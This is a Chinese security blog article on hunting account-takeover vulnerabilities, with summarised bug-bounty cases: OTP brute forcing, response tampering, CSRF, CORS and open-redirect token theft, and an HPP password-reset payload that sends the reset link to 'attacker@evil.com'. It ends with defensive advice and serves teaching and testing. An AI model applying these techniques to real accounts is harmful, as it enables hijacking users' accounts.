前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >账户接管(Account Takeover)漏洞挖掘及实战案例全汇总

账户接管(Account Takeover)漏洞挖掘及实战案例全汇总

作者头像
Jayway
发布于 2019-09-29 09:29:54
发布于 2019-09-29 09:29:54
5.1K0
举报
文章被收录于专栏:卓文见识卓文见识

1、漏洞理解:

首先澄清两个容易混淆的术语之间的区别:

身份验证(Authentication):验证某人是特定用户,是否正确提供其安全凭据(密码,安全问题答案,指纹扫描等)。

授权(Authorization):确认特定用户可以访问特定资源或被授予执行特定操作的权限。

所以,身份验证是知道实体是谁(who am I),而授权是知道给定实体可以做什么(what can I do)。后者涉及到的漏洞一般是“越权/IDOR”,本文谈论的是前者,身份验证方面缺陷,最常见也最严重的危害是完全的账户接管(Account Takeover)。ATO通常发生在金融、电商等行业系统,一旦发生必定是高危级的。

2、漏洞分类

涉及到账户认证的功能点一般有:

1)注册/登录

2)密码重置/找回(最常见):短信、邮箱

3)账户设置:CSRF

4)第三方账号绑定

5)用户凭证泄露:CORS、XSS、ClickJacking、重定向等

3、挖掘技巧

挖掘账户接管漏洞的思路是:

1、 关注涉及到用户鉴权的功能;

2、 理清功能的逻辑以及请求参数含义,猜测后端的验证逻辑;

3、 增删修改参数,比较回显的异同,寻找规律,确定逻辑是否可绕过。

4、实战案例

1)注册:Instagram暴力破解密码

Instagram允许通过其网站进行注册,使用密码passwd进行注册,注册成功后重放此数据包,显示“此认证属于一个激活的账号”:

删除请求中除“username”和“password”之外的所有参数后,使用正确的密码和一个不正确的密码重放,回显不一致,错误密码显示错误:

正确密码显示同上“已被激活”:

从而通过爆破获取正确密码:

2)Facebook验证码暴力破解

Facebook的主站设置速率限制及锁定机制,但子域beta.facebook.com通过短信/邮件找回密码时,验证码OTP未进行速率限制,导致有效时间内可爆破6位验证码:

爆破成功跳转进入设置新密码界面:

3)邮箱设置+CSRF

CSRF漏洞(传送门)中有涉及,/signup/email的API端点将账户与邮箱关联,构造csrf poc:

绑定邮箱后进行密码重置从而接管账户。

4)修改返回包

经典的前端验证绕过,要注意对于多过程的验证逻辑,操作是在Burp Suite请求包处右键—>Do intercept—>Response to this request。

如忘记密码,获取短信验证码后填写错误验证码,返回401:

将返回包中状态码401改为200,依旧失败:

将整个返回包修改为200,成功进入填写新密码的页面:

TIPS:可先探测操作成功的返回包,并将错误返回进行整包替换。

5)CORS窃取session token

若某个端点返回涉及到用户身份的token令牌,则可尝试通过CORS配置不当进行窃取,关于CORS可参考之前文章(传送门)。

6)HPP任意密码重置

重置密码处结合HPP思路(传送门),请求

https://hq.breadcrumb.com/api/v1/password_reset参数:

{"email_address":["admin@breadcrumb.com","attacker@evil.com"]}重复邮箱地址可将重置密码链接发往两个邮箱。

另一个参数相关的Paypal漏洞:使用其他方式如密保方式找回密码:

请求包中将两个密保参数SecurityQuestion删除:

成功绕过验证:

7)open redirect窃取jwt

开放重定向的其一利用手段(传送门),在用户登录之后再次请求登录跳转链接:

发现Location附带了用户凭证jwt,只要获取这个token值就获取了用户权限:

诱使用户点击跳转,访问受害者服务器的PHP文件,内容为:

攻击者通过查看日志获取受害者token,从而接管账号。

8)有规律可循的重置链接

印度一家大型公司的业务系统,发往邮箱的重置密码链接为:

http://www.xxx.com/account/resetpassword/?id=254346&token=dmFydW4wOTgxMUBnbWFpbC5jb20=&vit=MjAxNi8xMC8yNQ=

解码后发现token为账号的base64密文,vit为超时时间,修改参数可进行任意账号密码重置。

5、漏洞防御

了解漏洞的防御办法对于渗透工作者尤为重要,明白漏洞防御的各种手段,就能在挖掘中清楚哪些修复是“可以绕过”以及哪些是需要“尽早放弃”的。

比如对于身份验证,采用高复杂度的密码机制往往好过于双因素验证;任何涉及身份验证的端点都要在设置严格的速率限制或锁定机制;对于密码修改,验证旧密码是最好的办法;如采用了验证码机制要保证不被绕过;任何重要验证是否都是在服务器完成的等等。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-08-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 卓文见识 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
网站漏洞挖掘思路
未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。
R0A1NG
2022/06/15
1.6K0
SRC逻辑漏洞挖掘详解以及思路和技巧
由于程序逻辑不严谨或逻辑太过复杂,导致一些逻辑分支不能正常处理或处理错误,统称为业务逻辑漏洞。常见的逻辑漏洞有交易支付、密码修改、密码找回、越权修改、越权查询、突破限制等,下图是简单的逻辑漏洞总结,在挖掘的过程中更多的时候需要脑洞大开:
HACK学习
2020/02/26
5.8K0
SRC逻辑漏洞挖掘浅谈
巧用搜索引擎首推谷歌查看了解SRC旗下涉及到的业务,收集其对应的业务下的域名,再进一步进行挖掘,如:
HACK学习
2019/08/05
3.7K0
记录一些逻辑漏洞与越权的姿势
最近在看逻辑漏洞与越权相关书籍,记录一些常用的方法,每次检测的时候按照不同业务类型一个一个的去测试业务处
HACK学习
2019/12/25
2.4K0
实战 | 某大学注入+逻辑漏洞挖掘
当条件为真的时候会出现用户:007074。在这里,只需要将手机号替换为自己的手机号,我们在前面是直接注释掉了的,所以后面无法对身份证、手机号等进行有效效验,所以会直接通过验证。
HACK学习
2021/03/21
7400
逻辑漏洞小结之SRC篇
最近在挖各大src,主要以逻辑漏洞为主,想着总结一下我所知道的一些逻辑漏洞分享一下以及举部分实际的案例展示一下,方便大家理解。
FB客服
2020/03/03
1.9K0
逻辑漏洞总结
本篇文章是博主个人在网络学习时收集整理总结的笔记,在文章末尾已经标明参考原文的链接,有问题可以私聊整改。
LuckySec
2022/11/02
1.9K0
逻辑漏洞总结
任意用户密码重置(四):重置凭证未校验
在逻辑漏洞中,任意用户密码重置最为常见,可能出现在新用户注册页面,也可能是用户登录后重置密码的页面,或者用户忘记密码时的密码找回页面,其中,密码找回功能是重灾区。我把日常渗透过程中遇到的案例作了漏洞成因分析,这次,关注因重置凭证未校验导致的任意用户密码重置问题。 传送门: 任意用户密码重置(一):重置凭证泄漏 任意用户密码重置(二):重置凭证接收端可篡改 任意用户密码重置(三):用户混淆 密码找回需要鉴别用户的合法身份,证明你就是你,通常有两种做法,一是网站将重置验证码发至用户绑定的邮箱或手机号,用户持重置
FB客服
2018/03/22
2.7K0
任意用户密码重置(四):重置凭证未校验
CVE-2020-7245(CTFd账户接管漏洞)复现
在CTFd v2.0.0-v2.2.2的注册过程中,错误的用户名验证方式会允许攻击者接管任意帐户,前提是用户名已知并且在CTFd平台上启用了电子邮件功能。
字节脉搏实验室
2020/06/10
9360
CVE-2020-7245(CTFd账户接管漏洞)复现
Instagram曝出漏洞,10分钟破解任意账户
知名社交软件Instagram近日被曝出一个漏洞,号称可以在不与用户发生任何互动的情况下窃取对方ins账户。
FB客服
2019/07/22
2.6K0
Instagram曝出漏洞,10分钟破解任意账户
任意密码重置漏洞(身份认证缺失)
逻辑设计缺陷是由于应⽤在最初设计时由于未考虑全⾯,在登录、注册、找回密码、⽀付模块中程序的判断逻辑及程序的处理流程上存在缺陷,导致攻击者可以绕过程序的处理流程,从⽽达到特定的⽬的,如暴⼒破解密码,任意⽤户注册、任意用户登录、任意密码重置及各种⽀付漏洞。
LuckySec
2022/11/02
8870
任意密码重置漏洞(身份认证缺失)
越权漏洞(e.g. IDOR)挖掘技巧及实战案例全汇总
Insecure Direct Object reference (IDOR)不安全的直接对象引用,基于用户提供的输入对象直接访问,而未进行鉴权,这个漏洞在国内被称作越权漏洞。
Jayway
2019/09/29
5.9K0
越权漏洞(e.g. IDOR)挖掘技巧及实战案例全汇总
实战|记一次edu实战
最近刚好想着挖点洞练练手,像我这种菜鸡肯定是挖不到企业或者专属SRC(呜呜呜),只能转向教育SRC,找点软柿子捏
亿人安全
2023/04/11
8150
实战|记一次edu实战
十大漏洞之逻辑漏洞
在十大漏洞中,逻辑漏洞被称为“不安全的对象引用,和功能级访问控制缺失”。现如今,越权和逻辑漏洞占用比例比较高,包括任意查询用户信息,重置任意用户密码,验证码爆破等。
全栈程序员站长
2022/09/03
1.1K0
十大漏洞之逻辑漏洞
业务安全(逻辑漏洞)
近年来,随着信息化技术的迅速发展和全球一体化进程的不断加快,计算机和网络已经成为与所有 人都息息相关的工具和媒介,个人的工作、生活和娱乐,企业的管理,力全国家的反捉V资产处其外。信息和互联网带来的不仅仅是便利和高效,大量隐私、敏感和高价值的信息数据和资产, 成为恶意攻击者攻击和威胁的主要目标,从早期以极客为核心的黑客黄金时代,到现在利益链驱动的庞大黑色产业,网络安全已经成为任何个人、企业、组织和国家所必须面临的重要问题。“网络安全和信息化是事关国家安全和国家发展、事关广大人民群众工作生活的重大战略问题,没有网络安全就没有国家安全,没有信息化就没有现代化。”
全栈程序员站长
2022/09/06
1.1K0
业务逻辑漏洞总结[通俗易懂]
逻辑漏洞就是指攻击者利用业务/功能上的设计缺陷,获取敏感信息或破坏业务的完整性。一般出现在密码修改、越权访问、密码找回、交易支付金额等功能处。
全栈程序员站长
2022/09/01
3.3K0
业务逻辑漏洞总结
在平时学习安全中常常会有涉及到sql注入,xss,文件上传,命令执行等等常规的漏洞,但是在如今的环境下,结合当前功能点的作用,虽然不在owasp top10 中提及到,但是往往会存在的,一般叫做逻辑漏洞。
天钧
2020/12/03
1.8K0
新型渗透思路:两种密码重置之综合利用
在逻辑漏洞中,任意用户密码重置最为常见,可能出现在新用户注册页面,也可能是用户登录后重置密码的页面,或者用户忘记密码时的密码找回页面,其中,密码找回功能是重灾区。
FB客服
2018/07/30
5310
新型渗透思路:两种密码重置之综合利用
跨站请求伪造(CSRF)挖掘技巧及实战案例全汇总
Cross-Site Request Forgery跨站请求伪造漏洞,简称CSRF或XSRF,强制最终用户在当前对其进行身份验证的Web应用程序上执行不需要的操作,浏览器的安全策略是允许当前页面发送到任何地址的请求,所以用户在浏览无法控制的资源时,攻击者可以控制页面的内容来控制浏览器发送它精心构造的请求。
Jayway
2019/09/29
10.1K0
跨站请求伪造(CSRF)挖掘技巧及实战案例全汇总
逻辑漏洞之密码重置
案例介绍: 问题出现在忘记密码处,可以通过手机找回和邮箱找回密码两种方式获得指定帐户的新密码设置权限
信安之路
2018/08/08
1.6K0
逻辑漏洞之密码重置
相关推荐
网站漏洞挖掘思路
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档